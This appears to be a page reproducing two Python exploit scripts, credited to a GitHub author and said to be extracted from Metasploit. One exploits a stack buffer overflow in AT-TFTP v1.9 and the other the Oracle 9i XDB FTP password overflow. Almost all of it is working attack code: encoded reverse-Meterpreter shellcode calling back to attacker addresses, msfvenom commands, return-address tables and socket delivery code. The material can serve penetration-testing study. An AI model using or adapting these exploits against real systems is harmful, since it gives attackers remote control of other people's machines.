
Exploits a stack buffer overflow in AT-TFTP & XDB ftp password buffer overflow vulnerability.
+ Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
Extracted from Metasploit.
TODO: adjust -pick the right return address for the appropriate target
Usage: python oracle_xdb_ftp_pass-exploit.py <IP Address> <Port> <Your IP Address
+ Exploits Oracle 9i XDB ftp password buffer overflow vulnerability.
TODO: adjust
– rhost to point to the right target
– rport to use the right port
Execution: python oracle_xdb_ftp_pass-exploit.py
attftp_long_filename.py Script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
#!/usr/bin/python ## attftp_long_filename.py ## ## Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name. ## Extracted from Metasploit ## ## Spawns a reverse meterpreter shell to 192.168.193.17:443 ## ## Author Re4son <re4son [at] whitedome.com.au> ## ## TODO: adjust ## - pick the right return address for the appropriate target ## ## Usage: python oracle_xdb_ftp_pass-exploit.py <IP Address> <Port> <Your IP Address> import sys, socket rhost = sys.argv[1] # Target IP address as command line argument rport = int(sys.argv[2]) # Target Port as command line argument lhost = sys.argv[3] # Attackers IP address ## Return addresses according to metasploit: ## ## [ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ], ## [ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ], ## [ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ], ## [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ], ## [ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ], ## [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], ## [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], ## [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], ## [ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re ## [ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert ## [ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear ret = "\xd3\xfe\x86\x7c" # Return address (Little Endian) nops = "\x90" *(25-len(lhost)) ## Create NOP sled to brin NOPs & LHOST to 25 bytes ## Max space for shell code = 210 ## Bad characters according to metasploit: \x00 ## Payload via: ## ## Generate payload: msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=192.168.193.17 LPORT=443 -a x86 --platform Windows -f raw -o payload ## ## Prepend a stack adjust of -3500 to the payload before encoding: ## Obtain stack adjust of -3500 (0xdac as per printf '%x\n' 3500) with /usr/share/metasploit-framework/tools/nasm_shell.rb: ## nasm > sub esp, 0xdac ## 00000000 81ECAC0D0000 sub esp,0xdac ## add opcodes to a file: perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj ## ## Combine stackadj & payload: cat stackadj payload > shellcode ## hexdump -C shellcode ## 00000000 81 ec ac 0d 00 00 fc 6a eb 47 e8 f9 ff ff ff 60 |.......j.G.....`| ## 00000010 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea |1..}<.|=x...W ..| ## 00000020 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 |.4...1..........| ## 00000030 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b |u.Cf9.u.K.O$..f.| ## 00000040 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff |.Y.O....,..l$.a.| ## 00000050 e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 |.1.d.C0.@..p...h| ## 00000060 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 |.^fSfh32hws2_Tf.| ## 00000070 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 |r`...SSSSCSCS..f| ## 00000080 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f |....WSf.....f..o| ## 00000090 ff d6 97 68 c0 a8 0c c5 66 68 01 bb 66 53 89 e3 |...h....fh..fS..| ## 000000a0 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 |j.SWf.W...P..PSW| ## 000000b0 53 66 b9 c0 38 ff e6 |Sf..8..| ## 000000b7 ## ## Encode shellcode: cat shellcode | msfvenom -p - -b \x00 -a x86 --platform Windows -e x86/shikata_ga_nai -f python ## x86/shikata_ga_nai succeeded with size 210 (iteration=0) ## buf = "" buf += "\xba\xb9\x89\xf7\x9a\xdb\xd4\xd9\x74\x24\xf4\x5b\x29" buf += "\xc9\xb1\x2e\x83\xeb\xfc\x31\x53\x11\x03\x53\x11\xe2" buf += "\x4c\x08\x1b\x36\xa3\x0b\xe4\xbb\xd1\xe0\xa3\xab\xdc" buf += "\x08\xd4\xd3\x7e\xc6\xf0\xa7\x03\x14\x8c\xc4\xc6\x1c" buf += "\x93\xdb\xb3\x8a\xb3\x22\x29\xbf\x80\xbe\xac\x2e\xd9" buf += "\x7e\x37\x02\xdb\xb5\x4a\x5a\x1e\xcd\x94\x29\x68\x8d" buf += "\x72\xeb\x5e\x67\x99\x40\xd4\xc7\x79\x56\x03\xb1\x0a" buf += "\x44\x8a\xb5\x43\x69\x2d\x23\x58\xbd\xb4\x3a\x32\x99" buf += "\xda\x5d\x35\x01\xd3\x46\xad\x49\x57\x49\xa6\x0e\x54" buf += "\x22\xc8\x92\xc9\xbf\x40\xa3\x4f\xa6\xc3\xd5\x07\x15" buf += "\xd1\x71\xaf\x2a\x27\xdd\x1b\xab\xfe\x93\xc3\xcc\xd6" buf += "\xc1\x57\x60\x85\xba\x14\xd5\x6a\x6e\x12\x3e\x0a\x11" buf += "\xcb\xc9\xd0\x46\x47\xac\x6d\x8f\xb8\xcf\x5b\x36\xfe" buf += "\x98\x0c\x48\xd6\x4e\xba\x76\x7f\x7c\xff\x11\xe8\x7c" buf += "\x44\xbb\xbb\xf7\x59\x2e\x2c\x5b\xca\xc9\xf5\x0c\xf1" buf += "\xea\xd0\xe3\x4d\x18\x8d\x50\xfa\x72\x4b\xee\xc4\x4d" buf += "\x6c\xf6" tail = "" # tail from metasploit tail += "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn tail += "\x00netascii\x00" # Finish as expected by the AT TFTP server ## Let's build the exploit exploit = "\x00\x02" + nops + buf + ret + tail s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Declare a UDP socket try: print "\nDelivering package..." s.sendto(exploit, (rhost, rport)) print "\nPackage delivered!" except: print "\nCould not connect to " + rhost + ":" + str(rport) + "!" |
python oracle_xdb_ftp_pass-exploit.py Script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
#!/usr/bin/python ## oracle_xdb_ftp_pass-exploit.py ## ## Exploits Oracle 9i XDB ftp password buffer overflow vulnerability ## -> http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf ## ## Spawns a reverse meterpreter shell to 192.168.192.14:443 ## ## Author Re4son <re4son [at] whitedome.com.au ## ## TODO: adjust ## - rhost to point to the right target ## - rport to use the right port ## ## Execution: python oracle_xdb_ftp_pass-exploit.py import sys, socket, random, string rhost = "192.168.104.13" # Target IP address rport = 2100 # Target Port, can be 135, 137, 445 ## Return addresses according to metasploit: ## ## 0x60616d46 oraclient9.dll (pop/pop/ret) ret = "\x46\x6d\x61\x60" ## Return address (Little Endian) nops = "\x90" *(800-308-7) ## to fill 800 prependencoder = "\x81\xc4\xff\xef\xff\xff\x44" ## following the NOP sled, but before the decoder machine code ## Max space for shell code = 800 ## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 ## Shellcode via: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.192.14 LPORT=443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode ## x86/call4_dword_xor succeeded with size 308 (iteration=0) shellcode = "" shellcode += nops shellcode += prependencoder shellcode += "\x29\xc9\x83\xe9\xb9\xe8\xff\xff\xff\xff\xc0\x5e" shellcode += "\x81\x76\x0e\x8e\x9d\x91\xba\x83\xee\xfc\xe2\xf4" shellcode += "\x72\x75\x13\xba\x8e\x9d\xf1\x33\x6b\xac\x51\xde" shellcode += "\x05\xcd\xa1\x31\xdc\x91\x1a\xe8\x9a\x16\xe3\x92" shellcode += "\x81\x2a\xdb\x9c\xbf\x62\x3d\x86\xef\xe1\x93\x96" shellcode += "\xae\x5c\x5e\xb7\x8f\x5a\x73\x48\xdc\xca\x1a\xe8" shellcode += "\x9e\x16\xdb\x86\x05\xd1\x80\xc2\x6d\xd5\x90\x6b" shellcode += "\xdf\x16\xc8\x9a\x8f\x4e\x1a\xf3\x96\x7e\xab\xf3" shellcode += "\x05\xa9\x1a\xbb\x58\xac\x6e\x16\x4f\x52\x9c\xbb" shellcode += "\x49\xa5\x71\xcf\x78\x9e\xec\x42\xb5\xe0\xb5\xcf" shellcode += "\x6a\xc5\x1a\xe2\xaa\x9c\x42\xdc\x05\x91\xda\x31" shellcode += "\xd6\x81\x90\x69\x05\x99\x1a\xbb\x5e\x14\xd5\x9e" shellcode += "\xaa\xc6\xca\xdb\xd7\xc7\xc0\x45\x6e\xc2\xce\xe0" shellcode += "\x05\x8f\x7a\x37\xd3\xf5\xa2\x88\x8e\x9d\xf9\xcd" shellcode += "\xfd\xaf\xce\xee\xe6\xd1\xe6\x9c\x89\x62\x44\x02" shellcode += "\x1e\x9c\x91\xba\xa7\x59\xc5\xea\xe6\xb4\x11\xd1" shellcode += "\x8e\x62\x44\xea\xde\xcd\xc1\xfa\xde\xdd\xc1\xd2" shellcode += "\x64\x92\x4e\x5a\x71\x48\x06\xd0\x8b\xf5\x51\x12" shellcode += "\x82\x58\xf9\xb8\x8e\x9c\x2a\x33\x68\xf7\x81\xec" shellcode += "\xd9\xf5\x08\x1f\xfa\xfc\x6e\x6f\x0b\x5d\xe5\xb6" shellcode += "\x71\xd3\x99\xcf\x62\xf5\x61\x0f\x2c\xcb\x6e\x6f" shellcode += "\xe4\x9d\xfb\xbe\xd8\xca\xf9\xb8\x57\x55\xce\x45" shellcode += "\x5b\x16\xa7\xd0\xce\xf5\x91\xaa\x8e\x9d\xc7\xd0" shellcode += "\x8e\xf5\xc9\x1e\xdd\x78\x6e\x6f\x1d\xce\xfb\xba" shellcode += "\xd8\xce\xc6\xd2\x8c\x44\x59\xe5\x71\x48\x90\x79" shellcode += "\xa7\x5b\xe4\x54\x4d\x9d\x91\xba" user = "".join( [random.choice(string.uppercase) for i in xrange(10)] ) ## 10 random uppercase characters passwd = "".join( [random.choice(string.uppercase) for i in xrange(442)] ) ## 442 random uppercase characters jmp_short = "\xEB\x06" ## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6)) two_nops = "\x90\x90" ## Two NOP's ## Let's build the exploit that is send as password buffer = passwd + jmp_short + two_nops + ret + shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nConnecting..." s.connect((rhost,rport)) data = s.recv(1024) s.send('USER' + user +'\r\n') data = s.recv(1024) s.send('PASS ' + buffer + '\r\n') print "\nDone!" s.close except: print "Could not connect to " + rhost + ":" + str(rport) + "!" |
Source: https://github.com/Re4son